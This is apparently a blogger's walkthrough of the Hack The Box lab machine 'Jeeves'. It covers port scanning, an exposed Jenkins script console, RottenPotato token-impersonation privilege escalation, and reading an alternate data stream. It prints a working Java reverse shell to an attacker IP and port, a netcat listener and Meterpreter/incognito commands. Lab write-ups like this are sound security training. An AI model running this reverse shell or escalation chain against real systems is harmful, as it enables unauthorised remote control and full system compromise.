Introduction
Jeeves is a machine that is rated easy, this machine is hacked through exploiting unauthenticated jeeves dashboard usage. A java reverse shell is executed in Jeeves’ console script (where groovy script can be run for troubleshooting) is run and a reverse connection is connected back to my netcat server.
Once the reverse connection is established, I moved to the user’s desktop to get my user flag.
Checking on the user’s privilege there is a SeImpersonatePrivilege which is a condition to run rottenpotato to elevate to “NT Authority\System”
The next is privilege escalation with rottenpotato, rottenpotato works with incognito which is easily loaded if the shell is a meterpreter, the video on how to do the rottenpotato attack can be found here.
After the root flag is obtained, the last thing is to exit meterpreter and do a clean up with another connection by deleting the uploaded rottenpotato, to delete it has to be kill forcefull with taskkill /PID <pid of rottenpotato.
nmap
nmap -A -p- -oN jeeves -vvv 10.10.10.63
Increasing send delay for 10.10.10.63 from 0 to 5 due to 61 out of 202 dropped probes since last increase. Nmap scan report for 10.10.10.63 Host is up, received syn-ack (0.17s latency). Scanned at 2020-05-02 21:58:07 +08 for 595s Not shown: 65531 filtered ports Reason: 65531 no-responses PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Ask Jeeves 135/tcp open msrpc syn-ack Microsoft Windows RPC 445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 50000/tcp open http syn-ack Jetty 9.4.z-SNAPSHOT |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Error 404 Not Found Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 5h03m13s, deviation: 0s, median: 5h03m13s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 55172/tcp): CLEAN (Timeout) | Check 2 (port 48223/tcp): CLEAN (Timeout) | Check 3 (port 55682/udp): CLEAN (Timeout) | Check 4 (port 48293/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-02T19:10:36 |_ start_date: 2020-05-02T18:53:29 Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat May 2 22:08:02 2020 -- 1 IP address (1 host up) scanned in 595.85 seconds
Directory enumeration with gobuster on port 50000
gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o web_enum
The result is /askjeeves (Status: 302)
Check the 10.10.10.63:50000/askjeeves
Clicking on “Manage Jenkins” I found “Script Console”.
Reverse shell connection
I borrowed the java reverse shell from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#java and did changes on port and ip address.
String host="10.10.14.25";
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Then before I run the script on Jeeves script console I set up a nc service nc -lvnp 1337
Get the user flag
User’s privilege
the user has a SeImpersonatePrivilege which can be exploited by rottenpotato.exe.
Get meterpreter connection
I would need incognito to execute the rottenpotato in the background, the easiest around would be to load incognito from meterpreter.
To get a meterpreter I would be using exploit/multi/script/web_delivery to deliver the stagers over to Jeeves.
I used these settings for my exploit, target 2 is to specify that it is powershell, the default payload is a python script, hence after setting to target 2 I will have to change the payload to payload/windows/meterpreter/reverse_tcp, which is compatible with powershell.
The Jeeves machine runs a Windows 10 Pro, 64-bit, but I could not get the x64 reverse tcp delivered, the good old payload/windows/meterpreter/reverse_tcp was delivered.
I will copy and paste the powershell payload over to the nc session.
Privilege escalation
I have already downloaded the rottenpotato, I will upload the rottenpotato over to Jeeves, I have also loaded incognito, both load incognito and use incognito works.
By calling help, these are the incognito commands:
the current user has no tokens to impersonate, but after rottenpotato is executed the “NT Authority\System” will be available for impersonation.
The available options for execute are as follows:
execute -Hc -f /users/kohsuke/downloads/rottenpotato.exe, this will execute the rottenpotato in the background and create a channel for interacting with incognito.
Run list_tokens -u I will have available token to impersonate.
Run the incognito command: impersonate_token "NT AUTHORITY\SYSTEM".
There is a small twist, the hm.txt does not directly reveal the root flag.
I create a shell from meterpreter to execute dir /R this will reveal if any files have alternate stream.
read the alternate stream content: more < hm.txt:root.txt
Clean up
When I used tasklist /svc the rottenpotato was not displayed which is intended due to the execute -H option.
cyruslab 